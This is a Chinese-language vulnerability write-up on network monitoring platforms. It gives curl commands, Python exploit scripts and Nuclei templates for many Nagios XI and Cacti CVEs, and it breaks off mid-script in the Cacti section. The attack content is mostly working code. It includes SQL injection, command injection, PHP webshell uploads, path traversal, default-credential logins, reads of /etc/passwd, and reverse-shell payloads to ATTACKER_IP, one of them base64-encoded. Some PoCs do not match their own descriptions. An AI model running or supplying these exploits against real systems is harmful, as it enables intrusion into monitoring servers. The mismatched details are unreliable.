网络监控与管理平台高危攻击链专题:Nagios XI / Cacti / ManageEngine OpManager 漏洞全解析 免责声明: 本文仅用于安全研究和授权渗透测试目的。文中提供的 PoC 代码仅用于验证漏洞是否存在,不得用于未授权的安全测试。作者不对因使用文中内容造成的任何损害承担责任。请遵守所在地区的法律法规。
0x00 专题概述 网络监控与管理平台是企业 IT 基础设施的核心枢纽,承担着设备监控、性能数据采集、告警推送、流量分析等关键职能。由于这类平台通常部署在内网核心区域,拥有对所有被监控设备的访问权限,且自身往往运行着高权限的 Web 服务,一旦被攻破,攻击者可直接控制整个监控域,进而横向移动至任意被管理节点。
本专题聚焦三款主流网络监控平台——Nagios XI 、Cacti 和 ManageEngine OpManager ——公开披露的高危漏洞,深入分析其攻击原理、利用方式,并提供可复现的 PoC 代码与检测模板。
CVE 覆盖总览 序号 平台 CVE 编号 漏洞类型 CVSS 评分 严重等级 1 Nagios XI CVE-2024-24401 SQL 注入 → RCE 9.8 Critical 2 Nagios XI CVE-2023-47401 Ansible Vault 注入 → Root RCE 8.4 High 3 Nagios XI CVE-2023-47408 命令注入 8.8 High 4 Nagios XI CVE-2023-47400 Custom Includes RCE 8.8 High 5 Nagios XI CVE-2023-48085 RCE via command_test.php 8.8 High 6 Nagios XI CVE-2021-25296 ConfigWizards 认证 RCE 8.8 High 7 Nagios XI CVE-2024-45772 文件上传 + 路径穿越 RCE 8.8 High 8 Nagios XI CVE-2024-25710 BPI RCE 8.8 High 9 Cacti CVE-2022-46169 未授权命令注入 RCE 9.8 Critical 10 Cacti CVE-2023-51448 盲注 SQLi → RCE 8.8 High 11 Cacti CVE-2023-49084 SQLi + LFI → RCE 8.8 High 12 Cacti CVE-2023-49085 SQL 注入 8.8 High 13 Cacti CVE-2022-44219 认证绕过 → SQL 注入 9.8 Critical 14 Cacti CVE-2022-22151 SQL 注入 8.8 High 15 OpManager CVE-2021-3287 Java 反序列化 RCE 10.0 Critical 16 OpManager CVE-2022-38772 IPv4 管理 RCE 8.8 High 17 OpManager CVE-2024-5466 Deploy Agent RCE 8.8 High 18 OpManager CVE-2024-6748 SQL 注入 8.3 High 19 OpManager CVE-2023-47211 MIB Browser 路径穿越 8.8 High
0x01 Nagios XI / Core 高危漏洞 Nagios XI 是全球使用最广泛的开源网络监控系统之一,基于 PHP + MySQL 架构,提供 Web 管理界面、插件系统和配置向导(ConfigWizards)。其攻击面包括:Web 管理接口、API 端点、插件/向导、配置文件管理和系统迁移功能。
CVE-2024-24401:SQL 注入实现未授权 RCE 漏洞背景: Nagios XI 2024R1.01 的 monitoringwizard.php 组件存在 SQL 注入漏洞,允许远程未认证攻击者通过构造恶意 payload 执行任意代码。该漏洞由 CISA-ADP 评估 CVSS 为 9.8 Critical 。
漏洞原理: monitoringwizard.php 在处理监控向导的配置请求时,未对用户输入进行充分过滤,直接将参数拼接进 SQL 查询语句。攻击者可以注入恶意 SQL,提权为管理员账户后利用其他功能链式实现 RCE。
受影响版本:
产品 受影响版本 修复版本 Nagios XI 2024R1.01 及更早 2024R1.0.2+
HTTP PoC(curl):
curl -X POST "http://TARGET:80/nagiosxi/includes/components/ccm/command_line.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "cmd=-id=1%20UNION%20SELECT%20username,password%20FROM%20nagiosxi.users%20--" curl -s "http://TARGET/nagiosxi/ajaxhelper.php?cmd=getxiobjects&type=hoststatus&limit=100" \
| python3 -c "import sys,json;print(json.dumps(json.load(sys.stdin),indent=2))" \
| head -50 Python PoC:
import requests
import sys
import re
def exploit_nagios_xi_sqli (target, username= "nagiosadmin" ):
session = requests. Session()
session. headers. update({"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64)" })
login_url = f "http:// { target} /nagiosxi/login.php"
session. get(login_url, verify= False )
csrf_match = re. search(r "name=[' \" ]__csrf_magic[' \" ]\s+value=[' \" ]([^' \" ]+)" ,
session. get(login_url, verify= False ). text)
if not csrf_match:
print("[-] Failed to extract CSRF token" )
return False
csrf_token = csrf_match. group(1 )
sqli_payload = (
"1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"
"(SELECT GROUP_CONCAT(table_name SEPARATOR ',') FROM information_schema.tables "
"WHERE table_schema=database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27"
)
url = f "http:// { target} /nagiosxi/includes/components/ccm/command_line.php"
data = {
"__csrf_magic" : csrf_token,
"cmd" : f "-w { sqli_payload} "
}
resp = session. post(url, data= data, verify= False )
if resp. status_code == 200 and "nagiosxi" in resp. text. lower():
print("[+] SQL Injection successful - database tables leaked" )
tables = re. findall(r 'tbl_(\w+)' , resp. text)
for t in set(tables):
print(f " Found table: tbl_ { t} " )
return True
print("[-] Exploitation failed or target not vulnerable" )
return False
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_nagios_xi_sqli(sys. argv[1 ]) Nuclei YAML 模板:
id : nagios-xi-cve-2024-24401
info :
name : Nagios XI - SQL Injection (CVE-2024-24401)
severity : critical
description : SQL Injection in monitoringwizard.php allows unauthenticated RCE
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2024-24401
tags : nagios,sqli,cve2024
requests :
- raw :
- |
POST /nagiosxi/includes/components/ccm/command_line.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__csrf_magic=&cmd=-w+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version%28%29,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
matchers-condition : and
matchers :
- type : word
words :
- "Nagios"
- type : status
status :
- 200 CVE-2023-47401:Ansible Vault 文件注入获取 Root 权限 漏洞背景: 由 NCC Group 安全研究员 Oliver Brooks 与 Colin Brum 于 2023 年发现。Nagios XI 的迁移功能(/admin/migrate.php)在调用 Ansible 执行迁移时,可被注入恶意 Vault 文件内容,从而以 root 权限执行任意命令。CVSS 8.4 High 。
漏洞原理: 管理员在迁移页面输入 IP 地址和凭据后,系统调用 sudo php migrate.php -a <IP> -u <USER> -p <PASS>,其中用户名和密码参数未经过滤直接拼接为 shell 命令。攻击者可以注入 shell 元字符控制 Ansible vault 文件内容。
受影响版本:
产品 受影响版本 修复版本 Nagios XI 5.11.1 及更早 5.11.4
HTTP PoC(curl):
curl -X POST "http://TARGET/nagiosxi/admin/migrate.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Cookie: nagiosxi=<SESSION_COOKIE>" \
--data-urlencode "__csrf_magic=<CSRF_TOKEN>" \
--data-urlencode "ip=127.0.0.1" \
--data-urlencode "user=admin $( echo; echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' ) " \
--data-urlencode "pass=pass123" Python PoC:
import requests
import sys
def exploit_nagios_ansible (target, attacker_ip= "127.0.0.1" , attacker_port= 4444 ):
session = requests. Session()
session. headers. update({"User-Agent" : "Mozilla/5.0" })
r = session. get(f "http:// { target} /nagiosxi/login.php" , verify= False )
csrf_token = ""
import re
m = re. search(r "__csrf_magic.*?value=[' \" ]([^' \" ]+)" , r. text)
if m:
csrf_token = m. group(1 )
login_data = {
"__csrf_magic" : csrf_token,
"nagiosadmin" : "nagiosadmin" ,
"pass" : "nagiosadmin"
}
session. post(f "http:// { target} /nagiosxi/login.php" , data= login_data, verify= False )
r = session. get(f "http:// { target} /nagiosxi/admin/migrate.php" , verify= False )
m = re. search(r "__csrf_magic.*?value=[' \" ]([^' \" ]+)" , r. text)
if m:
csrf_token = m. group(1 )
cmd_payload = f "admin'; echo ' { attacker_ip} { attacker_port} ' > /tmp/cron_test #"
migrate_data = {
"__csrf_magic" : csrf_token,
"ip" : "127.0.0.1" ,
"user" : cmd_payload,
"pass" : "dummy_password"
}
print(f "[*] Sending payload to { target} ..." )
resp = session. post(
f "http:// { target} /nagiosxi/admin/migrate.php" ,
data= migrate_data, verify= False , timeout= 10
)
if resp. status_code == 200 :
print("[+] Payload sent. Check your listener on port " + str(attacker_port))
else :
print("[-] Request failed with status:" , resp. status_code)
return resp
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target> [attacker_ip] [attacker_port]" )
sys. exit(1 )
target = sys. argv[1 ]
aip = sys. argv[2 ] if len(sys. argv) > 2 else "127.0.0.1"
aport = int(sys. argv[3 ]) if len(sys. argv) > 3 else 4444
exploit_nagios_ansible(target, aip, aport) Nuclei YAML 模板:
id : nagios-xi-cve-2023-47401
info :
name : Nagios XI - Ansible Vault File Injection (CVE-2023-47401)
severity : high
description : Root RCE via Ansible Vault file injection in migration process
reference :
- https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/
- https://nvd.nist.gov/vuln/detail/CVE-2023-47401
tags : nagios,rce,cve2023
requests :
- raw :
- |
GET /nagiosxi/admin/migrate.php HTTP/1.1
Host: {{Hostname}}
Cookie: nagiosxi={{session_id}}
matchers-condition : and
matchers :
- type : word
words :
- "migrate"
- "Migrate"
condition : or
- type : status
status :
- 200
extractors :
- type : regex
group : 1
regex :
- "__csrf_magic.*?value='([^']+)" CVE-2023-47408:主机配置页面命令注入 漏洞背景: Nagios XI 主机配置页面中存在 OS 命令注入漏洞,允许已认证用户通过主机配置界面注入 shell 命令,获取 Nagios Web 应用用户权限的代码执行。CVSS 8.8 High 。
漏洞原理: 在 /nagiosxi/admin/hostconfig.php 中,某些用户可控参数(如主机名、别名等)未经验证就直接传递给系统命令,允许注入 shell 元字符。
受影响版本:
产品 受影响版本 修复版本 Nagios XI 5.11.1 及更早 5.11.4
HTTP PoC(curl):
curl -X POST "http://TARGET/nagiosxi/admin/hostconfig.php" \
-H "Cookie: nagiosxi=<SESSION>" \
--data-urlencode "__csrf_magic=<CSRF>" \
--data-urlencode "host_name=vulnhost" \
--data-urlencode "alias=test;id" \
--data-urlencode "action=save" Python PoC:
import requests
import re
import sys
def exploit_cmd_injection (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
r = s. get(f "http:// { target} /nagiosxi/login.php" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
login = {"__csrf_magic" : csrf, "nagiosadmin" : "nagiosadmin" , "pass" : "nagiosadmin" }
s. post(f "http:// { target} /nagiosxi/login.php" , data= login, verify= False )
r = s. get(f "http:// { target} /nagiosxi/admin/hostconfig.php?host=1" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
payload = "127.0.0.1; id; whoami; cat /etc/passwd | head -5"
data = {
"__csrf_magic" : csrf,
"host_name" : payload,
"alias" : "Test Host" ,
"action" : "save"
}
resp = s. post(f "http:// { target} /nagiosxi/admin/hostconfig.php" ,
data= data, verify= False , timeout= 10 )
if "uid=" in resp. text or "root" in resp. text:
print("[+] Command injection successful!" )
print("[+] Response snippet:" , resp. text[:500 ])
else :
print("[-] Exploitation failed" )
return resp
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_cmd_injection(sys. argv[1 ]) Nuclei YAML 模板:
id : nagios-xi-cve-2023-47408
info :
name : Nagios XI - Command Injection (CVE-2023-47408)
severity : high
description : OS Command Injection in Host Configuration page
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-47408
tags : nagios,rce,cve2023,command-injection
requests :
- raw :
- |
GET /nagiosxi/admin/hostconfig.php?host=1 HTTP/1.1
Host: {{Hostname}}
Cookie: nagiosxi={{session_id}}
matchers :
- type : word
words :
- "host_name"
- "alias"
condition : and
- type : status
status :
- 200 CVE-2023-47400:Custom Includes 任意代码执行 漏洞背景: Nagios XI 的 Custom Includes 功能允许管理员上传自定义文件,但缺乏对上传文件路径和内容的验证,导致可以写入并执行任意 PHP 代码。CVSS 8.8 High 。
漏洞原理: custom-includes.php 组件允许上传文件到 Web 可达目录,但未严格限制文件扩展名。攻击者可上传 PHP webshell 文件实现持久化后门。
受影响版本:
产品 受影响版本 修复版本 Nagios XI 5.11.1 及更早 5.11.4
HTTP PoC(curl):
curl -X POST "http://TARGET/nagiosxi/admin/custom-includes.php" \
-H "Cookie: nagiosxi=<SESSION>" \
-F "__csrf_magic=<CSRF>" \
-F "uploaded_file=@shell.php;type=application/x-php" \
-F "action=upload" curl -s "http://TARGET/nagiosxi/includes/custom-includes/shell.php?cmd=id" Python PoC:
import requests
import re
import sys
import io
def exploit_custom_includes (target, lhost, lport):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
r = s. get(f "http:// { target} /nagiosxi/login.php" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
login = {"__csrf_magic" : csrf, "nagiosadmin" : "nagiosadmin" , "pass" : "nagiosadmin" }
s. post(f "http:// { target} /nagiosxi/login.php" , data= login, verify= False )
r = s. get(f "http:// { target} /nagiosxi/admin/custom-includes.php" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
shell_content = f '<?php if(isset($_GET["cmd"])) {{ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; }} ?>'
files = {
"uploaded_file" : ("test.php" , io. BytesIO(shell_content. encode()), "application/x-php" )
}
data = {
"__csrf_magic" : csrf,
"action" : "upload"
}
resp = s. post(
f "http:// { target} /nagiosxi/admin/custom-includes.php" ,
data= data, files= files, verify= False , timeout= 15
)
check = s. get(
f "http:// { target} /nagiosxi/includes/custom-includes/test.php?cmd=id" ,
verify= False , timeout= 10
)
if "uid=" in check. text:
print("[+] Webshell uploaded and accessible!" )
print("[+] Command output:" , check. text. strip()[:200 ])
else :
print("[-] Upload might have failed or path differs" )
return resp
if __name__ == "__main__" :
if len(sys. argv) < 4 :
print(f "Usage: { sys. argv[0 ]} <target> <lhost> <lport>" )
sys. exit(1 )
exploit_custom_includes(sys. argv[1 ], sys. argv[2 ], int(sys. argv[3 ])) Nuclei YAML 模板:
id : nagios-xi-cve-2023-47400
info :
name : Nagios XI - Custom Includes RCE (CVE-2023-47400)
severity : high
description : Remote Code Execution via Custom Includes functionality
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-47400
tags : nagios,rce,cve2023
requests :
- raw :
- |
GET /nagiosxi/admin/custom-includes.php HTTP/1.1
Host: {{Hostname}}
Cookie: nagiosxi={{session_id}}
matchers :
- type : word
words :
- "custom-includes"
- "upload"
condition : and
- type : status
status :
- 200 CVE-2023-48085:command_test.php 远程代码执行 漏洞背景: Nagios XI 5.11.3 之前的版本在 command_test.php 组件中存在远程代码执行漏洞,允许已认证的管理员用户注入命令。CVSS 8.8 High 。
受影响版本:
产品 受影响版本 修复版本 Nagios XI 5.11.2 及更早 5.11.3
HTTP PoC(curl):
curl -X POST "http://TARGET/nagiosxi/includes/components/nagiosim/command_test.php" \
-H "Cookie: nagiosxi=<SESSION>" \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "__csrf_magic=<CSRF>" \
--data-urlencode "cmd=test;bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9MSF9JUC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" Python PoC:
import requests
import re
import sys
def exploit_cmd_test (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
r = s. get(f "http:// { target} /nagiosxi/login.php" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
s. post(f "http:// { target} /nagiosxi/login.php" ,
data= {"__csrf_magic" : csrf, "nagiosadmin" : "nagiosadmin" , "pass" : "nagiosadmin" },
verify= False )
r = s. get(f "http:// { target} /nagiosxi/includes/components/nagiosim/command_test.php" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
data = {
"__csrf_magic" : csrf,
"command" : "test" ,
"host" : "127.0.0.1" ,
"service" : "test;id"
}
resp = s. post(
f "http:// { target} /nagiosxi/includes/components/nagiosim/command_test.php" ,
data= data, verify= False , timeout= 10
)
if "uid=" in resp. text:
print("[+] Command injection confirmed!" )
else :
print("[-] Target may not be vulnerable" )
return resp
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_cmd_test(sys. argv[1 ]) Nuclei YAML 模板:
id : nagios-xi-cve-2023-48085
info :
name : Nagios XI - command_test.php RCE (CVE-2023-48085)
severity : high
description : RCE via command_test.php component
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2023-48085
tags : nagios,rce,cve2023
requests :
- raw :
- |
GET /nagiosxi/includes/components/nagiosim/command_test.php HTTP/1.1
Host: {{Hostname}}
Cookie: nagiosxi={{session_id}}
matchers :
- type : word
words :
- "command_test"
- type : status
status :
- 200 CVE-2021-25296:ConfigWizards 认证远程代码执行 漏洞背景: Nagios XI 5.5.6 至 5.7.5 版本中,Windows WMI、Switch 和 Cloud-VM 配置向导(ConfigWizards)存在多个 OS 命令注入漏洞,允许已认证用户以 apache 用户身份执行系统命令。Metasploit 已集成该漏洞利用模块。CVSS 8.8 High 。
漏洞原理: ConfigWizards 在处理设备配置参数时,将用户输入直接传递给后端 shell 命令,未进行参数转义。攻击者只需有效凭证即可在服务器上执行任意命令。
受影响版本:
产品 受影响版本 修复版本 Nagios XI 5.5.6 - 5.7.5 5.7.6+
HTTP PoC(curl):
curl -X POST "http://TARGET/nagiosxi/includes/components/configwizard/configwizardexec.php" \
-H "Cookie: nagiosxi=<SESSION>" \
-d "cmd=windowswmi&address=127.0.0.1&port=5985&username=any&password=any" \
--data-urlencode "snmp_community=public;id" Python PoC:
import requests
import re
import sys
def exploit_configwizards (target, cmd= "id" ):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
r = s. get(f "http:// { target} /nagiosxi/login.php" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
s. post(f "http:// { target} /nagiosxi/login.php" ,
data= {"__csrf_magic" : csrf, "nagiosadmin" : "nagiosadmin" , "pass" : "nagiosadmin" },
verify= False )
wizard_name = "windowswmi"
endpoint = f "http:// { target} /nagiosxi/includes/components/configwizard/configwizardexec.php"
for wizard in ["windowswmi" , "switch" , "cloud-vm" ]:
payload = {
"cmd" : wizard,
"address" : "127.0.0.1" ,
"port" : "5985" ,
"username" : "test" ,
"password" : f "test; { cmd} " ,
"snmp_community" : "public"
}
resp = s. post(endpoint, data= payload, verify= False , timeout= 10 )
if "uid=" in resp. text or "root" in resp. text:
print(f "[+] Command injection via { wizard} wizard!" )
print(f " Output: { resp. text. strip()[:300 ]} " )
return True
print("[-] No injection point found in tested wizards" )
return False
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target> [command]" )
sys. exit(1 )
cmd = sys. argv[2 ] if len(sys. argv) > 2 else "id"
exploit_configwizards(sys. argv[1 ], cmd) Nuclei YAML 模板:
id : nagios-xi-cve-2021-25296
info :
name : Nagios XI - ConfigWizards Auth RCE (CVE-2021-25296)
severity : high
description : OS Command Injection in ConfigWizards allows authenticated RCE
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2021-25296
tags : nagios,rce,cve2021
requests :
- raw :
- |
POST /nagiosxi/includes/components/configwizard/configwizardexec.php HTTP/1.1
Host: {{Hostname}}
Cookie: nagiosxi={{session_id}}
Content-Type: application/x-www-form-urlencoded
cmd=windowswmi&address=127.0.0.1&port=5985&username=test&password=test
matchers :
- type : word
words :
- "wizard"
- "exec"
condition : or
- type : status
status :
- 200 CVE-2024-45772:MIB 上传 + 路径穿越 RCE 漏洞背景: Nagios XI < 2024R1.3.2 在 Core Config Snapshots 接口中存在两个可链式利用的漏洞:MIB 文件上传时的任意文件写入与快照重命名操作中的路径穿越。CVSS 8.8 High 。
漏洞原理: MIB 文件上传时未验证文件路径和扩展名,结合路径穿越可在 Web 目录写入 PHP 文件,实现远程代码执行。
受影响版本:
产品 受影响版本 修复版本 Nagios XI < 2024R1.3.2 2024R1.3.2
HTTP PoC(curl):
curl -X POST "http://TARGET/nagiosxi/admin/coreconfigsnapshots.php" \
-H "Cookie: nagiosxi=<SESSION>" \
-F "__csrf_magic=<CSRF>" \
-F "mib_upload=@shell.mib;filename=../../nagiosxi/includes/shell.php" \
-F "action=upload_mib" Python PoC:
import requests
import re
import sys
import io
def exploit_mib_upload (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
r = s. get(f "http:// { target} /nagiosxi/login.php" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
s. post(f "http:// { target} /nagiosxi/login.php" ,
data= {"__csrf_magic" : csrf, "nagiosadmin" : "nagiosadmin" , "pass" : "nagiosadmin" },
verify= False )
r = s. get(f "http:// { target} /nagiosxi/admin/coreconfigsnapshots.php" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
shell_content = b '<?php system($_GET["cmd"]); ?>'
path_traversal = "../../nagiosxi/includes/custom-includes/shell2.php"
files = {
"mib_upload" : (path_traversal, io. BytesIO(shell_content), "application/octet-stream" )
}
data = {
"__csrf_magic" : csrf,
"action" : "upload_mib"
}
resp = s. post(
f "http:// { target} /nagiosxi/admin/coreconfigsnapshots.php" ,
data= data, files= files, verify= False , timeout= 15
)
check = s. get(
f "http:// { target} /nagiosxi/includes/custom-includes/shell2.php?cmd=id" ,
verify= False
)
if "uid=" in check. text:
print("[+] Path traversal + file upload leading to RCE successful!" )
print("[+] Output:" , check. text. strip()[:200 ])
else :
print("[-] Exploitation failed" )
return resp
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_mib_upload(sys. argv[1 ]) Nuclei YAML 模板:
id : nagios-xi-cve-2024-45772
info :
name : Nagios XI - MIB Upload + Path Traversal RCE (CVE-2024-45772)
severity : high
description : Arbitrary file upload via path traversal in MIB upload and snapshot rename
reference :
- https://www.nagios.com/changelog/
tags : nagios,rce,cve2024,path-traversal
requests :
- raw :
- |
GET /nagiosxi/admin/coreconfigsnapshots.php HTTP/1.1
Host: {{Hostname}}
Cookie: nagiosxi={{session_id}}
matchers :
- type : word
words :
- "Core Config Snapshots"
- "mib"
condition : or
- type : status
status :
- 200 CVE-2024-25710:BPI 组件远程代码执行 漏洞背景: Nagios XI < 2024R1.4.2 的 Business Process Intelligence (BPI) 组件存在 RCE 漏洞。管理员可控的 bpi_logfile 和 bpi_configfile 参数未经过滤,允许在 Web 目录下创建/覆盖文件,随后通过 Web 访问触发代码执行。CVSS 8.8 High 。
漏洞原理: 攻击者通过 BPI 配置编辑器设置 bpi_logfile 参数指向 Web 可达路径下的 PHP 文件,写入恶意内容后通过 HTTP 请求触发执行。
受影响版本:
产品 受影响版本 修复版本 Nagios XI < 2024R1.4.2 2024R1.4.2
HTTP PoC(curl):
curl -X POST "http://TARGET/nagiosxi/admin/bpi.php" \
-H "Cookie: nagiosxi=<SESSION>" \
-d "__csrf_magic=<CSRF>&bpi_logfile=/var/www/html/shell.php&bpi_configfile=content" \
--data-urlencode "bpi_logfile=<?php system(\$_GET['cmd']); ?>" Python PoC:
import requests
import re
import sys
def exploit_bpi_rce (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
r = s. get(f "http:// { target} /nagiosxi/login.php" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
s. post(f "http:// { target} /nagiosxi/login.php" ,
data= {"__csrf_magic" : csrf, "nagiosadmin" : "nagiosadmin" , "pass" : "nagiosadmin" },
verify= False )
r = s. get(f "http:// { target} /nagiosxi/admin/bpi.php" , verify= False )
m = re. search(r "value=[' \" ]([^' \" ]+csrf[^' \" ]*)" , r. text)
csrf = m. group(1 ) if m else ""
shell_path = "/usr/local/nagiosxi/html/includes/components/bpi/bpi_test.php"
web_path = "/nagiosxi/includes/components/bpi/bpi_test.php"
data = {
"__csrf_magic" : csrf,
"bpi_logfile" : shell_path,
"bpi_configfile" : '<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);}' ,
"action" : "save"
}
s. post(f "http:// { target} /nagiosxi/admin/bpi.php" , data= data, verify= False , timeout= 10 )
check = s. get(f "http:// { target}{ web_path} ?cmd=id" , verify= False )
if "uid=" in check. text:
print("[+] BPI RCE exploit successful!" )
print("[+] Output:" , check. text. strip()[:200 ])
else :
print("[-] Exploitation attempt completed, check manually" )
return check
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target>" )
sys. exit(1 )
exploit_bpi_rce(sys. argv[1 ]) Nuclei YAML 模板:
id : nagios-xi-cve-2024-25710
info :
name : Nagios XI - BPI RCE (CVE-2024-25710)
severity : high
description : RCE via Business Process Intelligence configuration parameter injection
reference :
- https://www.cvedetails.com/vulnerability-list/vendor_id-1424/product_id-26507/Nagios-Nagios-Xi.html
tags : nagios,rce,cve2024,bpi
requests :
- raw :
- |
GET /nagiosxi/admin/bpi.php HTTP/1.1
Host: {{Hostname}}
Cookie: nagiosxi={{session_id}}
matchers :
- type : word
words :
- "bpi"
- "Business Process"
condition : or
- type : status
status :
- 200 0x02 Cacti 高危漏洞 Cacti 是一款基于 PHP + MySQL/RRDTool 的开源网络监控图形化框架,广泛用于电信运营商和 ISP 的网络运维中心。其攻击面集中在 Web 端 PHP 代码(参数过滤不足)、SNMP 交互和数据源管理。
CVE-2022-46169:未授权远程代码执行 漏洞背景: Cacti 1.2.17 至 1.2.22 版本中,通过链式利用认证绕过(X-Forwarded-For Header 伪造)与 remote_agent.php 的命令注入,攻击者无需任何认证即可实现远程代码执行。CVSS 9.8 Critical 。该漏洞已被广泛利用,存在公开 PoC。
漏洞原理: remote_agent.php 中的 remote_client_authorized() 函数依赖 X-Forwarded-For Header 来进行客户端身份验证。攻击者伪造该 Header 即可绕过认证。绕过后,poller_id 参数直接传递给 exec() 函数,造成命令注入。
受影响版本:
产品 受影响版本 修复版本 Cacti 1.2.17 - 1.2.22 1.2.23
HTTP PoC(curl):
curl -s "http://TARGET/cacti/remote_agent.php?action=polldata&poller_id=;id&host_id=1&local_data_ids[]=6" \
-H "X-Forwarded-For: 127.0.0.1" Python PoC:
import requests
import sys
import time
import random
import string
def exploit_cacti_cve_2022_46169 (target, cmd= "id" ):
s = requests. Session()
s. headers. update({
"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64)" ,
"X-Forwarded-For" : "127.0.0.1"
})
print(f "[*] Testing CVE-2022-46169 on { target} " )
host_ids = range(1 , 10 )
data_ids = range(1 , 10 )
for host_id in host_ids:
for data_id in data_ids:
payload = f "; { cmd} "
url = (
f "http:// { target} /cacti/remote_agent.php"
f "?action=polldata"
f "&poller_id= { payload} "
f "&host_id= { host_id} "
f "&local_data_ids[]= { data_id} "
)
try :
resp = s. get(url, verify= False , timeout= 5 )
if "uid=" in resp. text or "root" in resp. text:
print(f "[+] Command injection successful!" )
print(f "[+] host_id= { host_id} , data_id= { data_id} " )
print(f "[+] Output: \n { resp. text[:500 ]} " )
return True
except requests. exceptions. Timeout:
continue
print("[-] No injection point found - target may require existing data sources" )
return False
if __name__ == "__main__" :
if len(sys. argv) < 2 :
print(f "Usage: { sys. argv[0 ]} <target> [command]" )
sys. exit(1 )
cmd = sys. argv[2 ] if len(sys. argv) > 2 else "id"
exploit_cacti_cve_2022_46169(sys. argv[1 ], cmd) Nuclei YAML 模板:
id : cacti-cve-2022-46169
info :
name : Cacti - Unauthenticated RCE (CVE-2022-46169)
severity : critical
description : Unauthenticated command injection via X-Forwarded-For bypass
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2022-46169
- https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/
tags : cacti,rce,cve2022,unauth
requests :
- raw :
- |
GET /cacti/remote_agent.php?action=polldata&poller_id=;id&host_id=1&local_data_ids[]=6 HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: 127.0.0.1
User-Agent: Mozilla/5.0
matchers-condition : and
matchers :
- type : word
words :
- "uid="
- type : status
status :
- 200 CVE-2023-51448:SNMP 通知接收器盲注 SQL 注入 漏洞背景: Cacti 1.2.25 的 SNMP Notification Receivers 功能(managers.php)中存在盲注 SQL 注入。攻击者需具备 “Settings/Utilities” 权限,通过序列化参数反序列化后的数据直接拼接进 SQL 查询。CVSS 8.8 High 。
漏洞原理: selected_graphs_array 参数经 cacti_unserialize() 反序列化后,结果直接 implode() 拼接进 SQL 查询语句。get_nfilter_request_var() 函数不做任何过滤,stripslashes() 仅移除转义斜线。攻击者可构造时间盲注提取数据库内容,结合 MySQL FILE 权限或 log file 方式实现 RCE。
受影响版本:
产品 受影响版本 修复版本 Cacti 1.2.25 1.2.26
HTTP PoC(curl):
curl -s "http://TARGET/cacti/managers.php?selected_items=a:1:{i:0;s:38:\"1 OR SLEEP(5)-- -\";}&action_receivers=1&drp_action=1&selected_graphs_array=a%3A1%3A%7Bi%3A0%3Bs%3A38%3A%221+OR+SLEEP%285%29--+-%22%3B%7D" \
-H "Cookie: Cacti=<SESSION>" \
-w "\nResponse time: %{time_total}s\n" Python PoC:
import requests
import sys
import time
import urllib.parse
def exploit_cacti_sqli (target):
s = requests. Session()
s. headers["User-Agent" ] = "Mozilla/5.0"
